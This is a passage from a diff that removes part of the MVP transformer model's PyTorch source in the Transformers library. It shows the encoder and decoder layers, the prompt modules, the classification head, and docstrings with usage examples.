encoder_hidden_states (`torch.FloatTensor`): - cross attention input to the layer of shape `(batch, seq_len, embed_dim)` - encoder_attention_mask (`torch.FloatTensor`): encoder attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size - `(encoder_attention_heads,)`. - cross_attn_layer_head_mask (`torch.FloatTensor`): mask for cross-attention heads in a given layer of - size `(decoder_attention_heads,)`. - self_attn_prompt (`torch.FloatTensor`): prompt of self attention of shape - `(2, decoder_attention_heads, pro_len, head_dim)`. - cross_attn_prompt (`torch.FloatTensor`): prompt of cross attention of shape - `(2, decoder_attention_heads, pro_len, head_dim)`. - past_key_value (`Tuple(torch.FloatTensor)`): cached past key and value projection states - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - """ - residual = hidden_states - - # Self Attention - # decoder uni-directional self-attention cached key/values tuple is at positions 1,2 - self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None - # add present self-attn cache to positions 1,2 of present_key_value tuple - hidden_states, self_attn_weights, present_key_value = self.self_attn( - hidden_states=hidden_states, - past_key_value=self_attn_past_key_value, - attention_mask=attention_mask, - layer_head_mask=layer_head_mask, - attn_prompt=self_attn_prompt, - output_attentions=output_attentions, - ) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.self_attn_layer_norm(hidden_states) - - # Cross-Attention Block - cross_attn_present_key_value = None - cross_attn_weights = None - if encoder_hidden_states is not None: - residual = hidden_states - - # cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple - cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None - hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn( - hidden_states=hidden_states, - key_value_states=encoder_hidden_states, - attention_mask=encoder_attention_mask, - layer_head_mask=cross_attn_layer_head_mask, - attn_prompt=cross_attn_prompt, - past_key_value=cross_attn_past_key_value, - output_attentions=output_attentions, - ) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.encoder_attn_layer_norm(hidden_states) - - # add cross-attn to positions 3,4 of present_key_value tuple - present_key_value = present_key_value + cross_attn_present_key_value - - # Fully Connected - residual = hidden_states - hidden_states = self.activation_fn(self.fc1(hidden_states)) - hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training) - hidden_states = self.fc2(hidden_states) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.final_layer_norm(hidden_states) - - outputs = (hidden_states,) - - if output_attentions: - outputs += (self_attn_weights, cross_attn_weights) - - if use_cache: - outputs += (present_key_value,) - - return outputs - - -# Copied from transformers.models.bart.modeling_bart.BartClassificationHead with Bart->MVP -class MvpClassificationHead(nn.Module): - """Head for sentence-level classification tasks.""" - - def __init__( - self, - input_dim: int, - inner_dim: int, - num_classes: int, - pooler_dropout: float, - ): - super().__init__() - self.dense = nn.Linear(input_dim, inner_dim) - self.dropout = nn.Dropout(p=pooler_dropout) - self.out_proj = nn.Linear(inner_dim, num_classes) - - def forward(self, hidden_states: torch.Tensor) -> torch.Tensor: - hidden_states = self.dropout(hidden_states) - hidden_states = self.dense(hidden_states) - hidden_states = torch.tanh(hidden_states) - hidden_states = self.dropout(hidden_states) - hidden_states = self.out_proj(hidden_states) - return hidden_states - - -class MvpPrompt(nn.Module): - """Layer-wise prompt for encoder or decoder.""" - - def __init__(self, config, num_layers, num_heads): - super().__init__() - self.prompt_length = config.prompt_length - self.num_layers = num_layers - self.num_heads = num_heads - self.head_dim = config.d_model // num_heads - self.dropout = nn.Dropout(p=config.dropout) - self.prompt_embedding = nn.Embedding(config.prompt_length, config.d_model) - self.prompt_trans = nn.Sequential( - nn.Linear(config.d_model, config.prompt_mid_dim), - nn.GELU(), - nn.Linear(config.prompt_mid_dim, num_layers * 2 * config.d_model), - ) - - def forward(self, prompt_ids: torch.Tensor) -> Tuple[torch.Tensor]: - prompt = self.prompt_trans(self.prompt_embedding(prompt_ids)) - prompt = prompt.view(self.prompt_length, self.num_layers * 2, self.num_heads, self.head_dim) - prompt = self.dropout(prompt) - prompt = prompt.permute([1, 2, 0, 3]).split(2) - return prompt - - -class MvpPreTrainedModel(PreTrainedModel): - config_class = MvpConfig - base_model_prefix = "model" - supports_gradient_checkpointing = True - - def _init_weights(self, module): - std = self.config.init_std - if isinstance(module, nn.Linear): - module.weight.data.normal_(mean=0.0, std=std) - if module.bias is not None: - module.bias.data.zero_() - elif isinstance(module, nn.Embedding): - module.weight.data.normal_(mean=0.0, std=std) - if module.padding_idx is not None: - module.weight.data[module.padding_idx].zero_() - - def _set_gradient_checkpointing(self, module, value=False): - if isinstance(module, (MvpDecoder, MvpEncoder, MvpPrompt)): - module.gradient_checkpointing = value - - @property - def dummy_inputs(self): - pad_token = self.config.pad_token_id - input_ids = torch.tensor([[0, 6, 10, 4, 2], [0, 8, 12, 2, pad_token]], device=self.device) - dummy_inputs = { - "attention_mask": input_ids.ne(pad_token), - "input_ids": input_ids, - } - return dummy_inputs - - -MVP_START_DOCSTRING = r""" - This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the - library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads - etc.) - - This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. - Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage - and behavior. - - Parameters: - config ([`MvpConfig`]): - Model configuration class with all the parameters of the model. Initializing with a config file does not - load the weights associated with the model, only the configuration. Check out the - [`~PreTrainedModel.from_pretrained`] method to load the model weights. -""" - -MVP_INPUTS_DOCSTRING = r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you provide - it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - decoder_input_ids (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*): - Indices of decoder input sequence tokens in the vocabulary. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are decoder input IDs?](../glossary#decoder-input-ids) - - Mvp uses the `eos_token_id` as the starting token for `decoder_input_ids` generation. If `past_key_values` - is used, optionally only the last `decoder_input_ids` have to be input (see `past_key_values`). - - For translation and summarization training, `decoder_input_ids` should be provided. If no - `decoder_input_ids` is provided, the model will create this tensor by shifting the `input_ids` to the right - for denoising pre-training following the paper. - decoder_attention_mask (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*): - Default behavior: generate a tensor that ignores pad tokens in `decoder_input_ids`. Causal mask will also - be used by default. - - If you want to change padding behavior, you should read [`modeling_mvp._prepare_decoder_attention_mask`] - and modify to your needs. See diagram 1 in [the paper](https://arxiv.org/abs/1910.13461) for more - information on the default strategy. - head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - decoder_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the cross-attention modules in the decoder. Mask values selected in `[0, - 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - encoder_outputs (`tuple(tuple(torch.FloatTensor)`, *optional*): - Tuple consists of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`) - `last_hidden_state` of shape `(batch_size, sequence_length, hidden_size)`, *optional*) is a sequence of - hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the decoder. - past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`): - Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of shape - `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of shape - `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. - - Contains pre-computed hidden-states (key and values in the self-attention blocks and in the cross-attention - blocks) that can be used (see `past_key_values` input) to speed up sequential decoding. - - If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that - don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all - `decoder_input_ids` of shape `(batch_size, sequence_length)`. inputs_embeds (`torch.FloatTensor` of shape - `(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing `input_ids` you - can choose to directly pass an embedded representation. This is useful if you want more control over how to - convert `input_ids` indices into associated vectors than the model's internal embedding lookup matrix. - decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, target_sequence_length, hidden_size)`, *optional*): - Optionally, instead of passing `decoder_input_ids` you can choose to directly pass an embedded - representation. If `past_key_values` is used, optionally only the last `decoder_inputs_embeds` have to be - input (see `past_key_values`). This is useful if you want more control over how to convert - `decoder_input_ids` indices into associated vectors than the model's internal embedding lookup matrix. - - If `decoder_input_ids` and `decoder_inputs_embeds` are both unset, `decoder_inputs_embeds` takes the value - of `inputs_embeds`. - use_cache (`bool`, *optional*): - If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see - `past_key_values`). - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned - tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for - more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. -""" - -MVP_CONDITIONAL_GENERATION_EXAMPLE = r""" - Example of summarization: - - Fine-tuning a model - ```python - >>> import torch - >>> from transformers import AutoTokenizer, MvpForConditionalGeneration - - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForConditionalGeneration.from_pretrained("RUCAIBox/mvp") - - >>> inputs = tokenizer( - ... "Summarize: You may want to stick it to your boss and leave your job, but don't do it if these are your reasons.", - ... return_tensors="pt", - ... ) - >>> labels = tokenizer("Bad Reasons To Quit Your Job", return_tensors="pt")["input_ids"] - - >>> loss = model(**inputs, labels=labels).loss - >>> loss.backward() - ``` - - Inference after the model fine-tuned - ```python - >>> with torch.no_grad(): - ... generated_ids = model.generate(**inputs) - - >>> generated_text = tokenizer.batch_decode(generated_ids, skip_special_tokens=True) - ``` -""" - -MVP_SEQUENCE_CLASSIFICATION_SAMPLE = r""" - Example of single-label classification: - - Fine-tuning a model on `num_labels` classes - ```python - >>> import torch - >>> from transformers import AutoTokenizer, MvpForSequenceClassification - - >>> num_labels = 2 # for example, this is a binary classification task - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForSequenceClassification.from_pretrained("RUCAIBox/mvp", num_labels=num_labels) - - >>> inputs = tokenizer("Classify: Hello, my dog is cute", return_tensors="pt") - >>> labels = torch.tensor(1) # the real label for inputs - - >>> loss = model(**inputs, labels=labels).loss - >>> loss.backward() - ``` - - Inference after the model fine-tuned - ```python - >>> with torch.no_grad(): - ... logits = model(**inputs).logits - - >>> predicted_class_id = logits.argmax() - ``` -""" - -MVP_QUESTION_ANSWERING_SAMPLE = r""" - Example: - - Fine-tuning a model for extrative question answering, and our model also supports generative question answering - using `BartForConditionalGeneration` - ```python - >>> import torch - >>> from transformers import AutoTokenizer, MvpForQuestionAnswering - - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForQuestionAnswering.from_pretrained("RUCAIBox/mvp") - - >>> inputs = tokenizer( - ... "Answer the following question: Who was Jim Henson? [SEP] Jim Henson was a nice puppet", - ... return_tensors="pt", - ... ) - >>> target_start_index = torch.tensor([18]) - >>> target_end_index = torch.tensor([19]) - - >>> loss = model(**inputs, start_positions=target_start_index, end_positions=target_end_index).loss - >>> loss.backward() - ``` - - Inference after the model fine-tuned - ```python - >>> with torch.no_grad(): - ... outputs = model(**inputs) - - >>> answer_start_index = outputs.start_logits.argmax() - >>> answer_end_index = outputs.end_logits.argmax() - - >>> predict_answer_tokens = inputs.input_ids[0, answer_start_index : answer_end_index + 1] - >>> predict_answer = tokenizer.decode(predict_answer_tokens) - ``` -""" - - -class MvpEncoder(MvpPreTrainedModel): - """ - Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a - [`MvpEncoderLayer`]. - - Args: - config: MvpConfig - embed_tokens (nn.Embedding): output embedding - use_prompt (bool): whether to use prompt - """ - - def __init__( - self, config: MvpConfig, embed_tokens: Optional[nn.Embedding] = None, use_prompt: Optional[bool] = False - ): - super().__init__(config) - - self.dropout = config.dropout - self.layerdrop = config.encoder_layerdrop - - embed_dim = config.d_model - self.padding_idx = config.pad_token_id - self.max_source_positions = config.max_position_embeddings - self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0 - - if embed_tokens is not None: - self.embed_tokens = embed_tokens - else: - self.embed_tokens = nn.Embedding(config.vocab_size, embed_dim, self.padding_idx) - - self.embed_positions = MvpLearnedPositionalEmbedding( - config.max_position_embeddings, - embed_dim, - ) - self.layers = nn.ModuleList([MvpEncoderLayer(config) for _ in range(config.encoder_layers)]) - self.layernorm_embedding = nn.LayerNorm(embed_dim) - - self.use_prompt = use_prompt - if use_prompt: - self.prompt_length = config.prompt_length - self.self_attn_prompt = MvpPrompt( - config, - config.encoder_layers, - config.encoder_attention_heads, - ) - - self.gradient_checkpointing = False - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.embed_tokens - - def set_input_embeddings(self, value): - self.embed_tokens = value - - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - head_mask: Optional[torch.Tensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, BaseModelOutput]: - r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*): - Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. - This is useful if you want more control over how to convert `input_ids` indices into associated vectors - than the model's internal embedding lookup matrix. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - """ - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - # retrieve input_ids and inputs_embeds - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time") - elif input_ids is not None: - input = input_ids - input_shape = input.shape - input_ids = input_ids.view(-1, input_shape[-1]) - elif inputs_embeds is not None: - input_shape = inputs_embeds.size()[:-1] - input = inputs_embeds[:, :, -1] - else: - raise ValueError("You have to specify either input_ids or inputs_embeds") - - if inputs_embeds is None: - inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale - - embed_pos = self.embed_positions(input) - - hidden_states = inputs_embeds + embed_pos - hidden_states = self.layernorm_embedding(hidden_states) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - - # layer-wise prompt - if self.use_prompt: - prompt_ids = torch.arange(self.prompt_length).to(self.device) - self_attn_prompt = self.self_attn_prompt(prompt_ids) - - # expand attention_mask - if attention_mask is not None: - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype) - - encoder_states = () if output_hidden_states else None - all_attentions = () if output_attentions else None - - # check if head_mask has a correct number of layers specified if desired - if head_mask is not None: - if head_mask.size()[0] != (len(self.layers)): - raise ValueError( - f"The head_mask should be specified for {len(self.layers)} layers, but it is for" - f" {head_mask.size()[0]}." - ) - - for idx, encoder_layer in enumerate(self.layers): - if output_hidden_states: - encoder_states = encoder_states + (hidden_states,) - # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description) - to_drop = False - if self.training: - dropout_probability = torch.rand([]) - if dropout_probability < self.layerdrop: # skip the layer - to_drop = True - - if to_drop: - layer_outputs = (None, None) - else: - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - return module(*inputs, output_attentions) - - return custom_forward - - layer_outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(encoder_layer), - hidden_states, - attention_mask, - (head_mask[idx] if head_mask is not None else None), - (self_attn_prompt[idx] if self.use_prompt else None), - ) - else: - layer_outputs = encoder_layer( - hidden_states, - attention_mask, - layer_head_mask=(head_mask[idx] if head_mask is not None else None), - self_attn_prompt=(self_attn_prompt[idx] if self.use_prompt else None), - output_attentions=output_attentions, - ) - - hidden_states = layer_outputs[0] - - if output_attentions: - all_attentions = all_attentions + (layer_outputs[1],) - - if output_hidden_states: - encoder_states = encoder_states + (hidden_states,) - - if not return_dict: - return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None) - return BaseModelOutput( - last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions - ) - - -class MvpDecoder(MvpPreTrainedModel): - """ - Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`MvpDecoderLayer`] - - Args: - config: MvpConfig - embed_tokens (nn.Embedding): output embedding - use_prompt (bool): whether to use prompt - """ - - def __init__( - self, config: MvpConfig, embed_tokens: Optional[nn.Embedding] = None, use_prompt: Optional[bool] = False - ): - super().__init__(config) - self.dropout = config.dropout - self.layerdrop = config.decoder_layerdrop - self.padding_idx = config.pad_token_id - self.max_target_positions = config.max_position_embeddings - self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0 - - if embed_tokens is not None: - self.embed_tokens = embed_tokens - else: - self.embed_tokens = nn.Embedding(config.vocab_size, config.d_model, self.padding_idx) - - self.embed_positions = MvpLearnedPositionalEmbedding( - config.max_position_embeddings, - config.d_model, - ) - self.layers = nn.ModuleList([MvpDecoderLayer(config) for _ in range(config.decoder_layers)]) - self.layernorm_embedding = nn.LayerNorm(config.d_model) - - self.use_prompt = use_prompt - if use_prompt: - self.prompt_length = config.prompt_length - self.self_attn_prompt = MvpPrompt( - config, - config.decoder_layers, - config.decoder_attention_heads, - ) - self.cross_attn_prompt = MvpPrompt( - config, - config.decoder_layers, - config.decoder_attention_heads, - ) - - self.gradient_checkpointing = False - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.embed_tokens - - def set_input_embeddings(self, value): - self.embed_tokens = value - - def _prepare_decoder_attention_mask(self, attention_mask, input_shape, inputs_embeds, past_key_values_length): - # create causal mask - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - combined_attention_mask = None - if input_shape[-1] > 1: - combined_attention_mask = _make_causal_mask( - input_shape, - inputs_embeds.dtype, - device=inputs_embeds.device, - past_key_values_length=past_key_values_length, - ) - - if attention_mask is not None: - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - expanded_attn_mask = _expand_mask(attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]) - combined_attention_mask = ( - expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask + combined_attention_mask - ) - - return combined_attention_mask - - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - encoder_hidden_states: Optional[torch.FloatTensor] = None, - encoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, BaseModelOutputWithPastAndCrossAttentions]: - r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, encoder_sequence_length, hidden_size)`, *optional*): - Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention - of the decoder. - encoder_attention_mask (`torch.LongTensor` of shape `(batch_size, encoder_sequence_length)`, *optional*): - Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values - selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the cross-attention modules in the decoder to avoid performing - cross-attention on hidden heads. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`): - Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of - shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of - shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. - - Contains pre-computed hidden-states (key and values in the self-attention blocks and in the - cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding. - - If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those - that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of - all `decoder_input_ids` of shape `(batch_size, sequence_length)`. inputs_embeds (`torch.FloatTensor` of - shape `(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing - `input_ids` you can choose to directly pass an embedded representation. This is useful if you want more - control over how to convert `input_ids` indices into associated vectors than the model's internal - embedding lookup matrix. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - """ - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - # retrieve input_ids and inputs_embeds - if input_ids is not None and inputs_embeds is not None: - raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time") - elif input_ids is not None: - input = input_ids - input_shape = input_ids.shape - input_ids = input_ids.view(-1, input_shape[-1]) - elif inputs_embeds is not None: - input_shape = inputs_embeds.size()[:-1] - input = inputs_embeds[:, :, -1] - else: - raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds") - - # past_key_values_length - past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0 - - if inputs_embeds is None: - inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale - - attention_mask = self._prepare_decoder_attention_mask( - attention_mask, input_shape, inputs_embeds, past_key_values_length - ) - - # expand encoder attention mask - if encoder_hidden_states is not None and encoder_attention_mask is not None: - # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len] - encoder_attention_mask = _expand_mask(encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]) - - # embed positions - positions = self.embed_positions(input, past_key_values_length) - - hidden_states = inputs_embeds + positions - hidden_states = self.layernorm_embedding(hidden_states) - - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - - # layer-wise prompt - if self.use_prompt: - prompt_ids = torch.arange(self.prompt_length).to(self.device) - self_attn_prompt = self.self_attn_prompt(prompt_ids) - cross_attn_prompt = self.cross_attn_prompt(prompt_ids) - - if self.gradient_checkpointing and self.training: - if use_cache: - logger.warning_once( - "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..." - ) - use_cache = False - - # decoder layers - all_hidden_states = () if output_hidden_states else None - all_self_attns = () if output_attentions else None - all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None - next_decoder_cache = () if use_cache else None - - # check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired - for attn_mask, mask_name in zip([head_mask, cross_attn_head_mask], ["head_mask", "cross_attn_head_mask"]): - if attn_mask is not None: - if attn_mask.size()[0] != (len(self.layers)): - raise ValueError( - f"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for" - f" {head_mask.size()[0]}." - ) - - for idx, decoder_layer in enumerate(self.layers): - # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description) - if output_hidden_states: - all_hidden_states += (hidden_states,) - if self.training: - dropout_probability = torch.rand([]) - if dropout_probability < self.layerdrop: - continue - - past_key_value = past_key_values[idx] if past_key_values is not None else None - - if self.gradient_checkpointing and self.training: - - def create_custom_forward(module): - def custom_forward(*inputs): - # None for past_key_value - return module(*inputs, output_attentions, use_cache) - - return custom_forward - - layer_outputs = torch.utils.checkpoint.checkpoint( - create_custom_forward(decoder_layer), - hidden_states, - attention_mask, - encoder_hidden_states, - encoder_attention_mask, - head_mask[idx] if head_mask is not None else None, - cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None, - self_attn_prompt[idx] if self.use_prompt else None, - cross_attn_prompt[idx] if self.use_prompt else None, - None, - ) - else: - layer_outputs = decoder_layer( - hidden_states, - attention_mask=attention_mask, - encoder_hidden_states=encoder_hidden_states, - encoder_attention_mask=encoder_attention_mask, - layer_head_mask=(head_mask[idx] if head_mask is not None else None), - cross_attn_layer_head_mask=( - cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None - ), - self_attn_prompt=(self_attn_prompt[idx] if self.use_prompt else None), - cross_attn_prompt=(cross_attn_prompt[idx] if self.use_prompt else None), - past_key_value=past_key_value, - output_attentions=output_attentions, - use_cache=use_cache, - ) - hidden_states = layer_outputs[0] - - if use_cache: - next_decoder_cache += (layer_outputs[3 if output_attentions else 1],) - - if output_attentions: - all_self_attns += (layer_outputs[1],) - - if encoder_hidden_states is not None: - all_cross_attentions += (layer_outputs[2],) - - # add hidden states from the last decoder layer - if output_hidden_states: - all_hidden_states += (hidden_states,) - - next_cache = next_decoder_cache if use_cache else None - if not return_dict: - return tuple( - v - for v in [hidden_states, next_cache, all_hidden_states, all_self_attns, all_cross_attentions] - if v is not None - ) - return BaseModelOutputWithPastAndCrossAttentions( - last_hidden_state=hidden_states, - past_key_values=next_cache, - hidden_states=all_hidden_states, - attentions=all_self_attns, - cross_attentions=all_cross_attentions, - ) - - -@add_start_docstrings( - "The bare MVP Model outputting raw hidden-states without any specific head on top.", - MVP_START_DOCSTRING, -) -class MvpModel(MvpPreTrainedModel): - _keys_to_ignore_on_load_unexpected = ["final_logits_bias"] - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight"] - - def __init__(self, config: MvpConfig): - super().__init__(config) - - padding_idx, vocab_size = config.pad_token_id, config.vocab_size - self.use_prompt = config.use_prompt - self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx) - - self.encoder = MvpEncoder(config, self.shared, config.use_prompt) - self.decoder = MvpDecoder(config, self.shared, config.use_prompt) - - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.shared - - def set_input_embeddings(self, value): - self.shared = value - 